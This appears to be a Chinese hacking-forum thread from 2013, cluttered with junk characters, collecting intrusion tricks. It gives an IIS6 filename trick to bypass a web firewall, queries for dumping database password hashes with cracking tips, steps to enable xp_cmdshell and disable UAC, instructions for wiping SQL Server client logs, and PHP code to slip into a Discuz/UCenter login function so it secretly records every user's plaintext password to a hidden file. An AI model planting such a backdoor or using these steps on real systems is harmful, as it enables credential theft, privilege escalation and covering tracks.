( H3 Z; z5 k* A8 A( N6 z利用II6文件解析漏洞绕过安全狗代码:0 }. ~! \8 s9 [( N, J f
;antian365.asp;antian365.jpg7 a/ r0 y9 J3 L; X! M+ \0 ?
% A; D5 ~: S4 ~各种类型数据库抓HASH破解最高权限密码!: J0 F, i' Z! U5 C# z c
1.sql server2000
0 O& m/ e- `' ?: x; H2 y* s1 a! }3 XSELECT password from master.dbo.sysxlogins where name='sa'- R1 k& M+ g0 w+ S& `( c
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 E0 ^! c. Q" ~0 F" G, ?
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A3 ^3 m: \2 B: D" _1 D4 V6 B
1 t% |% l8 M0 V' ~5 c0 s/ d( k
0×0100- constant header
* ]% ~- V0 p0 ]# M$ `4 z34767D5C- salt
- D! P+ Q2 k: U4 u( f ^: m0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash, j4 F$ w. n& P) r
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash2 N3 Y+ D/ O' Q6 F- ?
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
& W1 q4 \ Z; `! r x8 L0 lSQL server 2005:-2 j: Z' g6 _7 l: ~) y+ M {
SELECT password_hash FROM sys.sql_logins where name='sa'
) y3 V( ~7 H9 e- s! w/ G0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
) J) R( E% k# V/ l: `1 T1 b5 u3 z0×0100- constant header4 |4 x$ p/ p) X" h) n& U n
993BF231-salt
4 J0 F4 z7 w* ~# o) C7 x5 U5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) F3 s- W- u" V6 g @
crack case sensitive hash in cain, try brute force and dictionary based attacks.5 o) L k8 r; X6 H9 D' C# q
3 m- l+ T: j7 F1 ^- P1 ^
update:- following bernardo’s comments:-
4 f: v6 c7 J' ~) U! muse function fn_varbintohexstr() to cast password in a hex string.
- z- W3 Y7 a5 V5 Le.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins* [( a# B# N0 t2 R1 _+ Y* K
+ P/ i/ D3 j# E* C
MYSQL:-
# p A( @% x: S* b
& N' e3 y7 q( gIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.4 M* v/ J ^' g( C. V- z7 b$ F9 @5 H
; N, e, L9 E: D5 K* ?! X*mysql < 4.1& y/ l3 k8 z9 O' H' c* f& D( {
* F- Q3 I) U+ B# k2 W$ g( z, V; rmysql> SELECT PASSWORD(‘mypass’);
7 w& T# P$ h0 D! H9 x2 \5 p0 h9 C3 o+——————–+
% \* J7 w9 R q) z+ g8 {. j; D0 F }| PASSWORD(‘mypass’) |: q3 l, b p2 F( O
+——————–+
' V7 M& O9 ?* n& E% p| 6f8c114b58f2ce9e |/ N. O+ N- x$ i% G
+——————–+- d) e+ f$ o0 F8 e5 T
$ }. U, o: a, A% O% T
*mysql >=4.19 W$ _7 V/ |' n
' |6 x; u2 E; z! x) D& Emysql> SELECT PASSWORD(‘mypass’);, H- [! Z# p, k9 i
+——————————————-+
3 n3 G4 f: s+ o: p* F| PASSWORD(‘mypass’) |
0 I3 i9 V- m, H7 A" v5 E d+——————————————-+
4 C$ J6 ^' K; ~| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |3 }% t+ O9 Q# u% e# U
+——————————————-+
3 B8 J9 Q4 n+ q& t# \, i
% \: h# a' ~) y3 b* LSelect user, password from mysql.user
) d) W# M/ }9 N, s0 b/ jThe hashes can be cracked in ‘cain and abel’+ C0 s3 m) X9 R
. t7 l, F. [( d, c! a5 CPostgres:-! @. R* X8 L: G5 h& f) ?
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
4 z- X3 c$ b; @, H+ `select usename, passwd from pg_shadow;
$ g6 i: ?! i! h# b) Pusename | passwd2 `$ ?4 k3 S/ z5 E" J/ N
——————+————————————-
4 C9 i( J5 Q: G/ W* p- G8 ^# otestuser | md5fabb6d7172aadfda4753bf0507ed43967 @1 ^; x* Y" I4 S$ u# w; I! z
use mdcrack to crack these hashes:-# Y% k3 B$ m8 ?( G* W* w9 {
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
0 n( w5 _7 h7 L) ?) E/ S' T0 S0 P- ^ U: ~
Oracle:-
( y- S8 s" ~( W& p' c6 J) a% ^$ V& o, lselect name, password, spare4 from sys.user$+ [% h! w( P9 ]2 ^! s
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g" D1 I6 i6 x O0 J: E( K' K
More on Oracle later, i am a bit bored….
$ K( D& v5 z$ w; w; A0 Q. P/ u
0 j! J# D8 i% i$ f7 V( |* L+ |$ X$ C2 t) `- Y2 {1 a
在sql server2005/2008中开启xp_cmdshell* y5 J2 y& u+ O3 ?' T. O8 O4 `
-- To allow advanced options to be changed.3 `' Q; x& }6 V& }3 p: V
EXEC sp_configure 'show advanced options', 1, C4 r2 z6 p6 Y! w1 w; s
GO
* {# {( y& v3 ~" b; O. Y! i' m4 k-- To update the currently configured value for advanced options.
0 h: a i0 Y% J% J& U7 DRECONFIGURE
5 T3 u4 c ?% d! P2 W0 T) ?GO
_3 ^" g% n& Z6 ]" Q( |0 D-- To enable the feature.
! Q, {& A9 Q! k4 |2 WEXEC sp_configure 'xp_cmdshell', 1; Y8 l9 n- e1 f7 V& j- J0 o
GO
! i8 R; U$ f5 m5 B$ ?-- To update the currently configured value for this feature.- l a. `# N) S6 x% j
RECONFIGURE+ b7 E9 h; y2 ~1 ~
GO) N) p( l- Q r) v3 W$ `# i0 Z, u
SQL 2008 server日志清除,在清楚前一定要备份。
% a1 U# D Q; I, z Y. w: Y m6 [如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ N$ \( c- S% O. f6 `: qX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
. s: a# ^) ]2 t8 X% ^8 D9 k+ x
+ t1 b3 G1 m# g对于SQL Server 2008以前的版本:" U! e+ j' l4 d) ` Z" J- O0 Z
SQL Server 2005:! n! R6 Y3 y; _ f
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
4 h* V( F3 k& CSQL Server 2000:
" T: ]' v9 |% }" @清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
6 |# C) S' Z! B8 S' ^% i
7 @9 T6 |- M3 N3 ? e; h8 K0 D$ x8 A' |本帖最后由 simeon 于 2013-1-3 09:51 编辑
2 S6 ?: }: M: \* N/ u! P' f% s C- Y1 B$ j- M# R3 I
2 g/ _: K7 K; m0 Z+ v' k7 ?: k
windows 2008 文件权限修改
7 J! m! A. S5 Y6 `, \$ O- O1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; y8 l9 d8 X/ N' a7 A, ?$ _
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
9 w0 |. _$ f7 _9 n+ m) b一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
" o6 Q9 F" ?9 U$ M9 O: ^4 a( e( X& V& e9 V
Windows Registry Editor Version 5.00! A1 i( [+ i2 W, b: I
[HKEY_CLASSES_ROOT\*\shell\runas]" x# J- h" o5 E
@="管理员取得所有权"0 s( c$ k) L; A+ z; b
"NoWorkingDirectory"=""
" V) W" f: A- T( L( l8 F- q[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 S: b/ Z, M& G@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) Y1 P& i6 r1 l+ ~"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
6 U4 D1 n" L* W. N[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ X2 `/ ]3 T; ~
@="管理员取得所有权"
3 O" y7 ?, Q1 @: y3 F, }"NoWorkingDirectory"=""
6 P" r' z3 J3 n0 S( s I3 ?1 W[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
) {7 P/ M- M6 ?" l, [. {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 F6 r' [/ B5 ^2 r" q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ G3 i! d, H5 U3 S4 \; A$ t* W. \8 y7 O6 M6 s' K( \, b- ?
[HKEY_CLASSES_ROOT\Directory\shell\runas]
$ b5 q2 P5 j" N* I$ _' F& n; \@="管理员取得所有权"
7 V( j" H0 S$ o& {2 B"NoWorkingDirectory"=""
; f7 [) ~ D4 |+ v/ e+ O[HKEY_CLASSES_ROOT\Directory\shell\runas\command]! H/ l6 a( `, v3 L# ]( k; F8 e" S: v
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"# U; l( ]: P; f/ R: A- `
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
2 o; c: ^9 u5 E# m, b- A w# i# g: ]4 l% w
2 y) O3 u4 V- L" q/ {7 A- }# |win7右键“管理员取得所有权”.reg导入
7 e) b) e9 C5 {$ i4 V二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; j% M! ]1 O7 `6 b9 y; j# \. x
1、C:\Windows这个路径的“notepad.exe”不需要替换5 u$ h% P; [+ R) A% F; r
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
% S* I$ D4 @0 U: V3、四个“notepad.exe.mui”不要管
4 _& D* ]% Z2 h( p3 \4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
( t! u; T* m" {, [* uC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
0 W7 V) r0 S9 A: c) X" q替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,4 @3 T* j6 F6 i+ c
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
0 Q7 a( ~' Z/ @. dwindows 2008中关闭安全策略:
: O ^/ N1 ~( }" f8 R# ^3 E4 `" breg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f; B0 b5 ? S- o- Q
修改uc_client目录下的client.php 在
$ V. a3 T/ x% L% P1 Q* U6 l9 Lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
) F y1 j3 j5 b下加入如上代码,在网站./data/cache/目录下自动生成csslog.php$ {- T! U- F/ `7 w% \- R6 N
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw6 S% a1 |6 n3 I6 D; K
if(getenv('HTTP_CLIENT_IP')) {$ T) x/ F, w& q: ^8 G4 m; p, x
$onlineip = getenv('HTTP_CLIENT_IP');
& s. \- m% N# p8 @- J} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* I- o8 L* _3 J# y8 c. w$onlineip = getenv('HTTP_X_FORWARDED_FOR');/ P) I' g6 b; {5 v' z
} elseif(getenv('REMOTE_ADDR')) {7 u* Z5 q p5 r7 J2 T* ?7 j& I
$onlineip = getenv('REMOTE_ADDR');+ F3 O8 i: O/ {" [. B+ X' t$ ]
} else {' O: L6 ^: \7 e, G
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];. ]+ h3 U6 O. C
}
! f G- G: P% @9 G7 a; V! i! ~ $showtime=date("Y-m-d H:i:s");
; y# {7 M l( J$ D0 u2 I $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";9 Y6 b5 f/ j# `/ a0 r! g4 r
$handle=fopen('./data/cache/csslog.php','a+');1 [! E9 i- a H7 b5 ~4 f3 `
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对